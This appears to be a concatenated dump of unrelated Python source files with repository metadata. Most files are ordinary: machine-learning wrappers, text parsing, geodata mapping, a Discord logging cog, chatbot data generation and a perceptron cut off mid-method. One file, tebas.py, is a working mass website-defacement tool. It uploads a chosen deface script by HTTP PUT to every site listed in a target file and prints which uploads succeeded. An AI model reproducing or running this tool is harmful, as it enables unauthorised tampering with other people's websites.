def fit( self, x_train, y_train, batch_size=1, epochs=1, cropped=False, **kwargs ):
return self.model.fit( x_train, y_train, \
epochs=epochs, batch_size=batch_size, **kwargs)
def evaluate( self, x_test, y_test, batch_size=1, cropped=False ):
return self.model.evaluate(x_test, y_test, batch_size=batch_size )
def predict( self, x, batch_size=1, verbose=0 ):
return self.model.predict( x, batch_size=batch_size, verbose=verbose )
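# Hedged usage sketch (not part of the original file): wrapping a tiny Keras graph in
# GenericModel. The layer and optimizer names below are plain Keras defaults and are an
# assumption about how the class is meant to be driven, not something taken from this repo.
if __name__ == '__main__':
    from keras.layers import Input, Dense
    inputs = Input(shape=(8,))
    outputs = Dense(1, activation='sigmoid')(inputs)
    wrapper = GenericModel((inputs,), (outputs,), loss='binary_crossentropy',
                           metrics=['accuracy'], optimizer='adam')
    print(wrapper.inputs_shape, wrapper.outputs_shape)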
| 2.578125
| 3
|
old_files/Parsing_justifications_dev_skdclean.py
|
jmhernan/NIreland_NLP
| 1
|
12777713
|
################################################################
#### This is code for using regular expressions to clean / ####
#### parse text from Nvivo .txt into a workable format. ####
#### <NAME>9 ####
#### <NAME> Sarah ####
#### environment: ni_nlp ####
################################################################
## Activate environment
# conda activate ni_nlp
## cd into project
# cd OneDrive/Incubator/NIreland_NLP/
## Launch: python OR jupyter notebook
## Import python programs ##
import pandas as pd
import re
import os
## Load txt document
test_file = "/Users/sarahdreier/OneDrive/Incubator/NIreland_NLP/just_0106/J_Denial.txt"
f = open(test_file, "r")
text = f.read()
f.close()
## View txt file
text
## Split into unique string for each document (r signals regular expression)
test = re.split(r'.*(?=Files)', text)
## Examine output
test[2]
len(test) #120 lines, line 0 is blank
## Filter out blank lines
test2 = list(filter(None,test))
len(test2) #118 documents have the “denial” code - this is the same as in Nvivo
## Puts the list into a dataframe and name the raw text as its only column
prelim_df = pd.DataFrame(test2,columns=["raw_text"])
prelim_df.head
## Extracts image ID as a unique column
prelim_df["image_id"] = prelim_df["raw_text"].str.extract(r"(IMG_\d{4})")
prelim_df.head
## Extracts file ID as a unique column
prelim_df["file_id"] = prelim_df["raw_text"].str.extract(r"(DEFE\w+|PREM\w+|CJ\w+)")
prelim_df.head
## Fixing File/Image number issue (PREM 15 478, 1010, 1689).
# Note: 1010/1689 and 487 have overlapping image numbers (1010/1689: IMGs 001-205; 487: IMGs 001-258)
# This will be a problem later if we use IMG as a unique identifier
prelim_df["image_id2"] = prelim_df["file_id"].str.extract(r"(PREM_15_.*_\S*)")
prelim_df["image_id2"] = r"IMG_0" + prelim_df["image_id2"].str.extract(r"(\d{3}$)")
prelim_df["image_id"] = prelim_df["image_id"].fillna(prelim_df["image_id2"])
## Extracts justification text as its own raw-text column (Removes “Reference”)
prelim_df["just_text_lump"] = prelim_df["raw_text"].str.replace(r"(?<!Files)(.*)(?<=Coverage)", "").str.strip()
prelim_df["just_text_lump"].head
prelim_df["just_text_lump2"] = prelim_df["just_text_lump"].str.replace(r"\W+", " ") # This removes all non-letter characters, including \n spaces and punctuation.
## Extracts justification text as its own raw-text column (Retains “Reference” markers which can be used to split each unique code).
prelim_df["just_text"] = prelim_df["raw_text"].str.replace(r"(?<!Files)(.*)(?<=Coverage])", "").str.strip()
prelim_df["just_text"].head
## Extract the number of unique codes in this justification category a given document received
prelim_df["reference_count"] = prelim_df["raw_text"].str.extract(r"(\d\sreference)")
## Write out as a csv
prelim_df.to_csv("prelim_denial.csv")
## Text work to create a new variable for each unique reference
#re.compile(r"^>(\w+)$$([.$]+)^$", re.MULTILINE) #
#(Reference.\d)(.*)(?<=Reference.[2-5])
#prelim_df["test"] = prelim_df["raw_text"].str.extract(r"(Reference)(.*)(Files)", re.MULTILINE)
##################
## To set different rules for output
#pd.set_option('display.max_rows', 10)
#pd.set_option('display.max_rows', None)
## See number of references / codes per document — THIS DOESN’T WORK
#prelim_df["code_quantity"] = prelim_df["raw_text"].str.extract(r”(\d{2}references)")
| 3.234375
| 3
|
yt/frontends/art/api.py
|
danielgrassinger/yt_new_frontend
| 0
|
12777714
|
<filename>yt/frontends/art/api.py<gh_stars>0
"""
API for yt.frontends.art
"""
#-----------------------------------------------------------------------------
# Copyright (c) 2013, yt Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
from .data_structures import \
ARTDomainFile,\
ARTDomainSubset,\
ARTIndex,\
ARTDataset
from .fields import \
ARTFieldInfo
from .io import \
IOHandlerART
from . import tests
| 1.296875
| 1
|
single-use-scripts/generate-mod-eng-prose-genre-labels.py
|
timgianitsos/english-universal_feature_analysis
| 0
|
12777715
|
<filename>single-use-scripts/generate-mod-eng-prose-genre-labels.py<gh_stars>0
'''
Generate the csv of genre labels for files
'''
import os
from os.path import join, dirname
import csv
def main():
verse_dir = ('english-diachronic-corpus', 'Modern_English', 'Verse_Corpus')
prose_dir = ('english-diachronic-corpus', 'Modern_English', 'Plaintext_prose_corpus')
prose_genre_label_file = (
'english-diachronic-corpus', 'Modern_English', 'MdE_prose_metadata.csv',
)
'''
There are many categories with only a few texts within each. We will merge categories that are similar.
Original category counts:
Counter({
'EDUC_TREATISE': 24,'LETTERS_PRIV': 22,'HISTORY': 21,'TRAVELOGUE': 21,'FICTION': 21,
'DRAMA_COMEDY': 21,'DIARY_PRIV': 21,'HANDBOOK_OTHER': 21,'SERMON': 19,'SCIENCE_OTHER': 15,
'PROCEEDINGS_TRIAL': 10,'BIOGRAPHY_AUTO': 10,'BIBLE': 10,'LETTERS_NON-PRIV': 10,
'BIOGRAPHY_OTHER': 9,'SCIENCE_MEDICINE': 9,'LAW': 7,'PHILOSOPHY': 4,
})
MERGE: BIBLE, SERMON -> religious
MERGE: SCIENCE_OTHER, SCIENCE_MEDICINE -> science
MERGE: PROCEEDINGS_TRIAL, LAW -> law
MERGE: BIOGRAPHY_AUTO, BIOGRAPHY_OTHER -> biography
MERGE: LETTERS_PRIV, LETTERS_NON-PRIV -> letters
MERGE: HANDBOOK_OTHER, EDUC_TREATISE -> educ_treatise
MERGE: PHILOSOPHY, RELIGIOUS -> religious
Merged category counts:
Counter({
'educ_treatise': 45,'history': 21,'travelogue': 21,'fiction': 21,'drama_comedy': 21,
'diary_priv': 21,'science': 24,'biography': 19,'religious': 33,'letters': 32,'law': 17,
})
'''
found_label_to_merge_label = {
'BIBLE': 'religious',
'SERMON': 'religious',
'SCIENCE_OTHER': 'science',
'SCIENCE_MEDICINE': 'science',
'PROCEEDINGS_TRIAL': 'law',
'LAW': 'law',
'BIOGRAPHY_AUTO': 'biography',
'BIOGRAPHY_OTHER': 'biography',
'LETTERS_PRIV': 'letters',
'LETTERS_NON-PRIV': 'letters',
'HANDBOOK_OTHER': 'educ_treatise',
'EDUC_TREATISE': 'educ_treatise',
'PHILOSOPHY': 'religious',
'HISTORY': 'history',
'TRAVELOGUE': 'travelogue',
'FICTION': 'fiction',
'DRAMA_COMEDY': 'drama_comedy',
'DIARY_PRIV': 'diary_priv',
}
merge_label_to_value = {
'educ_treatise': 1, 'history': 2, 'travelogue': 3, 'fiction': 4, 'drama_comedy': 5,
'diary_priv': 6, 'science': 7, 'biography': 8, 'religious': 9, 'letters': 10, 'law':11,
}
with open(join(dirname(__file__), '..', 'labels', 'modern_english_prose_genre.csv'), mode='w') as label_f:
label_f.write(
f'verse:0,{",".join(f"{k}:{str(v)}" for k, v in merge_label_to_value.items())}\n'
)
label_f.write('Filename,Label\n')
for filename in os.listdir(join(dirname(__file__), '..', *verse_dir)):
if filename.endswith('txt'):
label_f.write(f'{"/".join(verse_dir)}/{filename},0\n')
csv_reader = csv.reader(open(join(dirname(__file__), '..', *prose_genre_label_file), mode='r'))
next(csv_reader)
for row in csv_reader:
label_f.write(
f'{"/".join(prose_dir)}/{row[0]}.txt,'
f'{merge_label_to_value[found_label_to_merge_label[row[2]]]}\n'
)
print('Success!')
if __name__ == '__main__':
main()
| 2.265625
| 2
|
srtm30_parser/map_pop_with_topo.py
|
marcwie/srtm30-parser
| 0
|
12777716
|
from sedac_gpw_parser import population
import numpy as np
from matplotlib import pyplot as plt
import matplotlib.colors as colors
import os
file_lons = np.arange(-180, 180, 40)
file_lats = np.arange(90, -20, -50)
DATA_FOLDER = os.path.expanduser("~") + "/.srtm30/"
def get_population_data(country_id):
pop = population.Population(country_id=country_id)
pop.mask_invalid_data(below=0)
data = pop.population_array()
lat = pop.latitude_range()
lon = pop.longitude_range()
lonmin = lon.min()
lonmax = lon.max()
latmax = lat.max()
latmin = lat.min()
extent = (lonmin, lonmax, latmin, latmax)
return data, extent
def get_infiles(lonmin, lonmax, latmin, latmax):
print(lonmin, lonmax, latmin, latmax)
lonmask = (file_lons >= (lonmin - 40)) & (file_lons <= lonmax)
latmask = (file_lats >= latmin) & (file_lats <= (latmax + 50))
valid_lons = file_lons[lonmask]
valid_lats = file_lats[latmask]
latmax = np.round(latmax + 1/120, 8) # Add 1/120 because topographic data is with respect to UPPER LEFT corner
latmin = np.round(latmin + 1/120, 8) # Add 1/120 because topographic data is with respect to UPPER LEFT corner
lonmin = np.round(lonmin, 8)
lonmax = np.round(lonmax, 8)
n_lat = int(np.round((latmax - latmin) * 120) + 1)
n_lon = int(np.round((lonmax - lonmin) * 120) + 1)
full_data = np.zeros((n_lat, n_lon))
lat_offset = 0
for valid_lat in valid_lats:
#print(valid_lat, end="\r")
file_lat_range = np.round(np.arange(valid_lat, valid_lat-50, -1/120), 8)
valid_file_lat_range = (file_lat_range <= latmax) & (file_lat_range >= latmin)
n_row = valid_file_lat_range.sum()
lon_offset = 0
for valid_lon in valid_lons:
file_lon_range = np.round(np.arange(valid_lon, valid_lon+40, +1/120), 8)
valid_file_lon_range = (file_lon_range <= lonmax) & (file_lon_range >= lonmin)
n_col = valid_file_lon_range.sum()
if valid_lon < 0:
lon_pref = "W"
else:
lon_pref = "E"
if valid_lat < 0:
lat_pref = "S"
else:
lat_pref = "N"
infile = lon_pref + str(abs(valid_lon)).zfill(3) + lat_pref + str(abs(valid_lat)).zfill(2) + ".DEM"
with open(DATA_FOLDER+infile) as infile:
data = np.fromfile(infile, np.dtype('>i2')).reshape(6000, 4800)
print(valid_lat, valid_lon, "cutting data")
data = data[valid_file_lat_range]
data = data[:, valid_file_lon_range]
print("storing data")
full_data[lat_offset:lat_offset+n_row,lon_offset:lon_offset+n_col]=data
lon_offset += n_col
del data
lat_offset += n_row
return full_data
def truncate_colormap(cmap, minval=0.25, maxval=1.0, n=100):
new_cmap = colors.LinearSegmentedColormap.from_list(
'trunc({n},{a:.2f},{b:.2f})'.format(n=cmap.name, a=minval, b=maxval),
cmap(np.linspace(minval, maxval, n)))
return new_cmap
def get_topomap():
colors_undersea = plt.cm.terrain(np.linspace(0, 0.17, 2))
colors_land = plt.cm.terrain(np.linspace(0.25, 1, 256))
all_colors = np.vstack((colors_undersea, colors_land))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
terrain_map = truncate_colormap(cmap=plt.get_cmap('terrain'))
terrain_map.set_under("#254DB3")
terrain_map.set_bad("0.5")
return terrain_map
def main(country_id, plot=True):
pop, extent = get_population_data(country_id=country_id)
lonmin, lonmax, latmin, latmax = extent
print("Getting topography data from disk...")
topo_data = get_infiles(lonmin, lonmax, latmin, latmax)
print("Removing empty cols")
contains_values = []
for col_id in range(pop.shape[1]):
print(col_id, pop.shape[1], end="\r")
if np.isfinite(pop[:, col_id]).any():
contains_values.append(col_id)
print(len(contains_values), pop.shape)
pop = pop[:, contains_values]
topo_data = topo_data[:, contains_values]
print("Removing empty rows")
contains_values = []
for row_id in range(pop.shape[0]):
print(row_id, pop.shape[1], end="\r")
if np.isfinite(pop[row_id]).any():
contains_values.append(row_id)
print(len(contains_values), pop.shape)
pop = pop[contains_values]
topo_data = topo_data[contains_values]
print("setting invalid values...")
#for i, _pop in enumerate(pop):
# print(i, len(pop), end="\r")
topo_data[np.isnan(pop)] = np.nan
print("Total population:", np.nansum(pop))
if plot:
f, (ax1, ax2) = plt.subplots(1, 2, figsize=(12, 9))
terrain_map = get_topomap()
ax1.imshow(topo_data, vmin=0, vmax=4000, cmap=terrain_map, rasterized=True)
ax2.imshow(pop, vmin=0, vmax=50)
plt.savefig("pop_topo.png")
return pop, topo_data
def distribution(pop, topo, return_total=False, plot=True, resolution=500,
max_elevation=20, add_noise=True):
mask = np.isfinite(topo)
topo = topo[mask]
pop = pop[mask]
# Make sure that some artifacts where elevation is negative are set to zero
topo[topo <= 0] = 0
#topo[topo == 0] += 0.5 * np.random.random((topo == 0).sum())
#topo[topo >= 0.5] += np.random.random((topo >= 0.5).sum()) - 0.5
if add_noise:
topo+= np.random.random(len(topo))
valid_topo = np.linspace(0, max_elevation, resolution)
results = np.zeros_like(valid_topo, dtype=float)
#total_population = pop.total_population()
for i, elevation in enumerate(valid_topo):
mask = topo <= elevation
#mask = topo == elevation
results[i] = pop[mask].sum()
total_population = np.sum(pop)
results /= total_population
#results = results.cumsum() / total_population
if plot:
f = plt.figure()
#plt.semilogy()
plt.plot(valid_topo, results)
plt.xlabel("Elevation x [m above sea level]")
plt.ylabel("Share of population living at or below x")
plt.savefig("population_elevation.png")
if return_total:
return valid_topo, results, total_population
else:
return valid_topo, results
if __name__ == "__main__":
pop, topo = main(840, plot=True)
distribution(pop, topo, plot=True)
| 2.859375
| 3
|
api/service/update_balance.py
|
guisteglich/EasyPay
| 0
|
12777717
|
<gh_stars>0
from api.extensions.mongo import update_user
def balance_update(id, value, balance):
balance_value_updated = int(value) + int(balance)
new_values = { "$set": { "balance": balance_value_updated } }
response = update_user(id, new_values)
return response
def balance_update_payer(id, value, balance):
balance_value_updated = int(balance) - int(value)
print("valor atualizado do pagador: ", balance_value_updated)
if balance_value_updated < 0:
print("if")
return "not ok"
else:
print("entrei")
new_values = { "$set": { "balance": balance_value_updated } }
response = update_user(id, new_values)
return response
| 2.734375
| 3
|
rfv_bullet.py
|
rfernandezv/Faster-R-CNN-bullet
| 1
|
12777718
|
<filename>rfv_bullet.py<gh_stars>1-10
# importing required libraries
# https://www.analyticsvidhya.com/blog/2018/11/implementation-faster-r-cnn-python-object-detection/
import pandas as pd
import matplotlib.pyplot as plt
import cv2
from matplotlib import patches
# column order is: name, bullet (type), x1, x2, y1, y2
# read the csv file using read_csv function of pandas
train = pd.read_csv('train.csv',delimiter=";")
train.head()
# Blue color in BGR
color = (255, 0, 0)
# Line thickness of 2 px
thickness = 2
# reading single image using imread function of matplotlib
image = plt.imread('train_images/IMG_6974.JPG')
plt.imshow(image)
# Number of unique training images
train['image_names'].nunique()
# Number of classes
train['type'].value_counts()
#fig = plt.figure()
#add axes to the image
#ax = fig.add_axes([0,0,1,1])
# iterating over the image for different objects
for _,row in train[train.image_names == "IMG_6974.JPG"].iterrows():
xmin = int(row.xmin)
xmax = int(row.xmax)
ymin = int(row.ymin)
ymax = int(row.ymax)
width = xmax - xmin
height = ymax - ymin
print("xmin:"+str(xmin))
print("xmax:"+str(xmax))
print("ymin:"+str(ymin))
print("ymax:"+str(ymax))
# assign different color to different classes of objects
color = (255, 0, 0)
edgecolor = 'r'
#ax.annotate('bullet', xy=(xmax-40,ymin+20))
# add bounding boxes to the image
#rect = patches.Rectangle((xmin,ymin), width, height, edgecolor = edgecolor, facecolor = 'none')
#ax.add_patch(rect)
# Draw a rectangle with blue line borders of thickness of 2 px
image = cv2.rectangle(image, (xmin,ymin), (xmax, ymax), color, thickness)
cv2.imwrite("detected.jpg", image)
#plt.imshow(image)
data = pd.DataFrame()
data['format'] = train['image_names']
# as the images are in train_images folder, add train_images before the image name
for i in range(data.shape[0]):
data['format'][i] = 'train_images/' + data['format'][i]
# add xmin, ymin, xmax, ymax and class as per the format required
for i in range(data.shape[0]):
data['format'][i] = data['format'][i] + ',' + str(int(train['xmin'][i])) + ',' + str(int(train['ymin'][i])) + ',' + str(int(train['xmax'][i])) + ',' + str(int(train['ymax'][i])) + ',' + train['type'][i]
data.to_csv('annotate.txt', header=None, index=None, sep=' ')
| 3.390625
| 3
|
petsi/plugins/sojourntime/__init__.py
|
vadaszd/petsi
| 0
|
12777719
|
<reponame>vadaszd/petsi
""" A plugin that collects by-place sojourn time stats.
.. rubric:: Public package interface
- Class :class:`SojournTimePlugin` (see below)
.. rubric:: Internal submodules
.. autosummary::
:template: module_reference.rst
:recursive:
:toctree:
petsi.plugins.sojourntime._sojourntime
"""
from dataclasses import dataclass, field
from itertools import count
from typing import Iterator, Optional, TYPE_CHECKING
from ...util import export
from ..meters import MeterPlugin
from ._sojourntime import SojournTimeCollector, SojournTimePluginTokenObserver
if TYPE_CHECKING:
from ..interface import NoopPlaceObserver, NoopTransitionObserver
from ..._structure import Token
@export
@dataclass(eq=False)
class SojournTimePlugin(
MeterPlugin["SojournTimeCollector", "NoopPlaceObserver", "NoopTransitionObserver",
"SojournTimePluginTokenObserver"]):
""" A PetSi plugin providing by-place sojourn time stats.
The plugin collects the empirical distribution of the
time a token spends at each place of the observed Petri net,
i.e. in what percentage of the tokens seen was the per-visit and overall time
spent by the token at place j in bucket i of the histogram.
On the per-visit histograms each stay is translated into a separate increment.
The bucket is selected based on the time the token spent at the place during a single visit.
On the overall histograms one increment represents all the visits of a token at a given place.
The bucket is selected based on the cumulative time the token spent at the place during its whole life.
"""
token_id: Iterator[int] = field(default_factory=count, init=False)
def __post_init__(self):
self._collector = SojournTimeCollector(self._n)
def token_observer_factory(self, t: "Token") -> Optional[SojournTimePluginTokenObserver]:
return SojournTimePluginTokenObserver(self, t, self._places, self._clock,
self._collector, next(self.token_id)) \
if self._token_types is None or t.typ.ordinal in self._token_types else None
| 2.421875
| 2
|
moderation_module/guild_logging/guild_logging.py
|
alentoghostflame/StupidAlentoBot
| 1
|
12777720
|
from moderation_module.guild_logging.commands import guild_logging_control, send_delete_embed, send_edit_embed, \
send_joined_embed, send_remove_embed
from moderation_module.storage import GuildLoggingConfig
from alento_bot import StorageManager
from discord.ext import commands
import moderation_module.text
import logging
import discord
logger = logging.getLogger("main_bot")
# TODO: Update logging to latest standards, reach feature parity with Sx4.
class GuildLoggingCog(commands.Cog, name="Logging"):
def __init__(self, storage: StorageManager):
self.storage: StorageManager = storage
self.storage.guilds.register_data_name("guild_logging_config", GuildLoggingConfig)
@commands.has_permissions(administrator=True)
@commands.command(name="guild_logging_control", aliases=["logging", ])
async def guild_logging_control(self, context: commands.Context, arg1=None, arg2=None):
logging_config = self.storage.guilds.get(context.guild.id, "guild_logging_config")
await guild_logging_control(logging_config, context, arg1, arg2)
@guild_logging_control.error
async def missing_permissions_error(self, context, error: Exception):
if isinstance(error, commands.MissingPermissions):
await context.send(moderation_module.text.MISSING_PERMISSIONS)
else:
await context.send(f"ERROR:\nType: {type(error)}\n{error}")
raise error
@commands.Cog.listener()
async def on_message_delete(self, message: discord.Message):
logging_config: GuildLoggingConfig = self.storage.guilds.get(message.guild.id, "guild_logging_config")
if logging_config.toggled_on and logging_config.log_channel_id and \
message.channel.id not in logging_config.exempt_channels and \
(logging_config.log_bots or (not logging_config.log_bots and not message.author.bot)):
await send_delete_embed(logging_config, message)
@commands.Cog.listener()
async def on_message_edit(self, before: discord.Message, after: discord.Message):
logging_config: GuildLoggingConfig = self.storage.guilds.get(after.guild.id, "guild_logging_config")
if logging_config.toggled_on and logging_config.log_channel_id and \
after.channel.id not in logging_config.exempt_channels and \
(logging_config.log_bots or (not logging_config.log_bots and not after.author.bot)) and \
before.content != after.content:
await send_edit_embed(logging_config, before, after)
@commands.Cog.listener()
async def on_member_join(self, member: discord.Member):
logging_config: GuildLoggingConfig = self.storage.guilds.get(member.guild.id, "guild_logging_config")
if logging_config.toggled_on and logging_config.log_channel_id:
await send_joined_embed(logging_config, member)
@commands.Cog.listener()
async def on_member_remove(self, member: discord.Member):
logging_config: GuildLoggingConfig = self.storage.guilds.get(member.guild.id, "guild_logging_config")
if logging_config.toggled_on and logging_config.log_channel_id:
await send_remove_embed(logging_config, member)
| 2.09375
| 2
|
src/drkns/generation/templateloading/get_generation_template_path.py
|
frantzmiccoli/drkns
| 13
|
12777721
|
import os
import re
from drkns.exception import MissingGenerationTemplateDirectoryException, \
MissingGenerationTemplateException, MultipleGenerationTemplateException
_template_directory = '.drknsgeneration'
_template_file_re = re.compile(r'^.*\.template\..*$')
def get_generation_template_path(from_path: str) -> str:
template_directory = os.path.join(from_path, _template_directory)
if not os.path.exists(template_directory):
error_message = template_directory + ' directory can not be found'
raise MissingGenerationTemplateDirectoryException(error_message)
contained_files = os.listdir(template_directory)
matched_files = []
for contained_file in contained_files:
pattern_match = \
_template_file_re.match(contained_file)
if pattern_match is None:
continue
matched_files.append(contained_file)
if len(matched_files) == 0:
error_message = 'No template found in ' + template_directory
raise MissingGenerationTemplateException(error_message)
if len(matched_files) > 1:
error_message = 'Multiple template found in ' + \
template_directory + ': ' + ', '.join(matched_files)
        raise MultipleGenerationTemplateException(error_message)
return os.path.join(template_directory, matched_files.pop())
| 2.625
| 3
|
tebas.py
|
Jack007notabohu/Webdav-
| 0
|
12777722
|
<filename>tebas.py<gh_stars>0
#create BY Jack007
#-*- coding: utf-8 -*-
try:
import requests
import os.path
import sys
except ImportError:
exit("install requests and try again ...")
banner = """
``````````
`/- ```..`.`....`..``` `//.
--hm: ``.```` `` `` `` ````.`` +Ny-:
-d/ms/ `.` ```````++sy.`````` `.``+sh+d.
`:dy/yh.`. `` ` --sh` ` `` .`-hy/ms+`
d/dhy+ .` ```.````` .- `````.``` `. oydssy
`Msood-`` . .````ss````. . ``:do/hN
-mhhd- . ` ` .. . ` . :dddh/
-h:ms+: .`````.````.`+:-ss-:+`.``````````. /+om.m.
.No/oN` . ```oshmNM.`oo`.MNmhso``` . `Ns-yN`
`sM+M+. . .+MMMMMM` oo `MMMMMM+. . -+MsM+`
.++dm.h `. .mMMMMMMo dd oMMMMMMm. .` d.dd:y.
yd/++N` `````/MMMMMMMM+mm+MMMMMMMM/````` .M+/omo
oNhoM:o``. yMMMMMMMMMMMMMMMMMMMMy .`.s:Momd/
-++hmoom` .`mMMMMMMMMMMMMMMMMMMMMm`. .N+sms/o.
-hyoo-Nh--.MMMMMMMMMMMMMMMMMMMMMM.:-hm-osdy.
:ymmhmoshyNMMMMMMMMMMMMMMMMMMNydssmdNds.
./ooss++dddNMMMMMMMMMMMMMMNmddoossoo/.
./yhhhyooNMMMMMMMMMMMMMMmoosyyys:`
`:+shmNMMMMMMMMMMMMMMMMmmhyo/`
:MMMMMMMMMMMMMMMM:
`:+syhdmmmmdhys+:`
MASS deface BY
Jack007
visit my blog for tutorial
https://Jack007notabohu.my.id
"""
b = '\033[31m'
h = '\033[32m'
m = '\033[00m'
def x(tetew):
ipt = ''
if sys.version_info.major > 2:
ipt = input(tetew)
else:
ipt = raw_input(tetew)
return str(ipt)
def aox(script,target_file="target.txt"):
op = open(script,"r").read()
with open(target_file, "r") as target:
target = target.readlines()
s = requests.Session()
print("uploading file to %d website"%(len(target)))
for web in target:
try:
site = web.strip()
if site.startswith("http://") is False:
site = "http://" + site
req = s.put(site+"/"+script,data=op)
if req.status_code < 200 or req.status_code >= 250:
print(m+"["+b+" FAILED!"+m+" ] %s/%s"%(site,script))
else:
print(m+"["+h+" SUCCESS"+m+" ] %s/%s"%(site,script))
except requests.exceptions.RequestException:
continue
except KeyboardInterrupt:
print; exit()
def main(__bn__):
print(__bn__)
while True:
try:
a = x("Enter your script deface name: ")
if not os.path.isfile(a):
print("file '%s' not found"%(a))
continue
else:
break
except KeyboardInterrupt:
print; exit()
aox(a)
if __name__ == "__main__":
main(banner)
| 2
| 2
|
make_data/traffic/make_traffic_data.py
|
ricosr/travel_consult_chatbot
| 0
|
12777723
|
# -*- coding: utf-8 -*-
from traffic_templates import *
def clean_traffic_data1(term_file):
with open(term_file, 'r', encoding="utf-8") as fpr:
terms_temp_ls = fpr.readlines()
terms_ls = [term2.strip() for term2 in terms_temp_ls]
return terms_ls
def create_traffic_data(term_file, output_file):
terms_ls = []
terms_ls.extend(clean_traffic_data1(term_file))
temp_result = ''
for traffic_term in list(set(terms_ls)):
temp_result += traffic_template1.format(destination=traffic_term).strip() + '\n'
for i in range(len(terms_ls)):
if i == len(terms_ls) - 1:
break
temp_result += traffic_template2.format(departure=terms_ls[i], destination=terms_ls[i+1]).strip() + '\n'
with open(output_file, 'w', encoding="utf-8") as fpw:
fpw.write("## intent:consult_traffic\n")
fpw.write(temp_result)
with open("traffic_terms.txt", 'w', encoding="utf-8") as fpw2:
for term in terms_ls:
fpw2.write(term + '\n')
def create_traffic_data2(term_file, vehicle_terms, output_file, data_count):
vehicle_terms = clean_traffic_data1(vehicle_terms)
terms_ls = []
terms_ls.extend(clean_traffic_data1(term_file))
len_ls1 = len(traffic_template_ls_1a) + len(traffic_template_ls_1b) + len(traffic_template_ls_1c)
len_ls2 = len(traffic_template_ls2)
count1a = int(data_count * len(traffic_template_ls_1a)/(len_ls1+len_ls2))
count1b = int(data_count * len(traffic_template_ls_1b)/(len_ls1+len_ls2))
count1c = int(data_count * len(traffic_template_ls_1c)/(len_ls1+len_ls2))
count2 = int(data_count * len_ls2/(len_ls1+len_ls2))
# print(count1a, count1b, count2)
temp_result = ''
traffic_ls2 = traffic_template_ls2 * (count2 // len_ls2)
temp_result += '\n'.join(traffic_ls2) + '\n'
traffic_ls_1a = traffic_template_ls_1a * (count1a // len(traffic_template_ls_1a))
traffic_ls_1b = traffic_template_ls_1b * (count1b // len(traffic_template_ls_1b))
traffic_ls_1c = traffic_template_ls_1c * (count1c // len(traffic_template_ls_1c))
i = 0
j = 0
for traffic_template in traffic_ls_1a:
if j == len(terms_ls):
j = 0
if i == len(vehicle_terms):
i = 0
temp_result += traffic_template.format(destination=terms_ls[j], vehicle=vehicle_terms[i]) + '\n'
i += 1
j += 1
i = 0
j = 0
for traffic_template in traffic_ls_1b:
        if j >= len(terms_ls) - 1:
j = 0
if i == len(vehicle_terms):
i = 0
temp_result += traffic_template.format(departure=terms_ls[j], destination=terms_ls[j+1], vehicle=vehicle_terms[i]) + '\n'
i += 1
j += 2
j = 0
for traffic_template in traffic_ls_1c:
        if j >= len(terms_ls) - 1:
j = 0
temp_result += traffic_template.format(departure=terms_ls[j], destination=terms_ls[j + 1]) + '\n'
j += 2
with open(output_file, 'w', encoding="utf-8") as fpw:
fpw.write("## intent:consult_traffic\n")
fpw.write(temp_result)
with open("traffic_terms.txt", 'w', encoding="utf-8") as fpw2:
for term in terms_ls+vehicle_terms:
fpw2.write(term + '\n')
# create_traffic_data("beijing_spots", "traffic_train_data.md")
create_traffic_data2("beijing_spots", "vehicle", "traffic_train_data8.md", 8000)
| 2.78125
| 3
|
deepl/enums.py
|
sorbatti/deepl.py
| 0
|
12777724
|
<gh_stars>0
from enum import Enum
__all__ = [
'SourceLang',
'TargetLang',
'SplitSentences',
'PreserveFormatting',
'Formality'
]
class SourceLang(Enum):
Bulgarian = 'BG'
Czech = 'CS'
Danish = 'DA'
German = 'DE'
Greek = 'EL'
English = 'EN'
Spanish = 'ES'
Estonian = 'ET'
Finnish = 'FI'
French = 'FR'
Hungarian = "HU"
Italian = "IT"
Japanese = "JA"
Lithuanian = "LT"
Latvian = "LV"
Dutch = "NL"
Polish = "PL"
Portuguese = "PT"
Romanian = "RO"
Russian = "RU"
Slovak = "SK"
Slovenian = "SL"
Swedish = "SV"
Chinese = "ZH"
class TargetLang(Enum):
Bulgarian = 'BG'
Czech = 'CS'
Danish = 'DA'
German = 'DE'
Greek = 'EL'
English = 'EN'
English_GB = 'EN-GB'
English_US = 'EN-US'
Spanish = 'ES'
Estonian = 'ET'
Finnish = 'FI'
French = 'FR'
Hungarian = 'HU'
Italian = 'IT'
Japanese = 'JA'
Lithuanian = 'LT'
Latvian = 'LV'
Dutch = 'NL'
Polish = 'PL'
Portuguese = 'PT-PT'
Portuguese_BR = 'PT-BR'
Portuguese_PT = 'PT'
Romanian = 'RO'
Russian = 'RU'
Slovak = 'SK'
Slovenian = 'SL'
Swedish = 'SV'
Chinese = 'ZH'
class SplitSentences(Enum):
enabled = 0
disabled = 1
nonewlines = 'nonewlines'
class PreserveFormatting(Enum):
respect = 1
ignore = 2
class Formality(Enum):
default = 'default'
more = 'more'
less = 'less'
class FileStatus(Enum):
queued = 'queued'
translating = 'translating'
done = 'done'
error = 'error'
| 2.3125
| 2
|
Assignment-1/hw1_perceptron.py
|
ZhangShiqiu1993/CSCI-567-machine-learning
| 0
|
12777725
|
from __future__ import division, print_function
from typing import List, Tuple, Callable
import numpy as np
import scipy
import matplotlib.pyplot as plt
class Perceptron:
def __init__(self, nb_features=2, max_iteration=10, margin=1e-4):
'''
Args :
nb_features : Number of features
max_iteration : maximum iterations. You algorithm should terminate after this
many iterations even if it is not converged
margin is the min value, we use this instead of comparing with 0 in the algorithm
'''
self.nb_features = nb_features
self.w = [0 for i in range(0,nb_features+1)]
self.margin = margin
self.max_iteration = max_iteration
def train(self, features: List[List[float]], labels: List[int]) -> bool:
'''
Args :
features : List of features. First element of each feature vector is 1
to account for bias
labels : label of each feature [-1,1]
Returns :
True/ False : return True if the algorithm converges else False.
'''
seq = [x for x in range(len(features))]
threshold = self.margin / 2
converge = False
scale = np.linalg.norm(features)
for iteration in range(self.max_iteration):
if converge:
break
converge = True
np.random.shuffle(seq)
for i in seq:
pred = np.dot(self.w, features[i])
y = 0
if pred > threshold:
y = 1
elif pred < -threshold:
y = -1
if y != labels[i]:
self.w = np.add(self.w, np.dot(labels[i], features[i]))
converge = False
self.w = self.w.tolist()
return converge
def reset(self):
self.w = [0 for i in range(0,self.nb_features+1)]
def predict(self, features: List[List[float]]) -> List[int]:
'''
Args :
features : List of features. First element of each feature vector is 1
to account for bias
Returns :
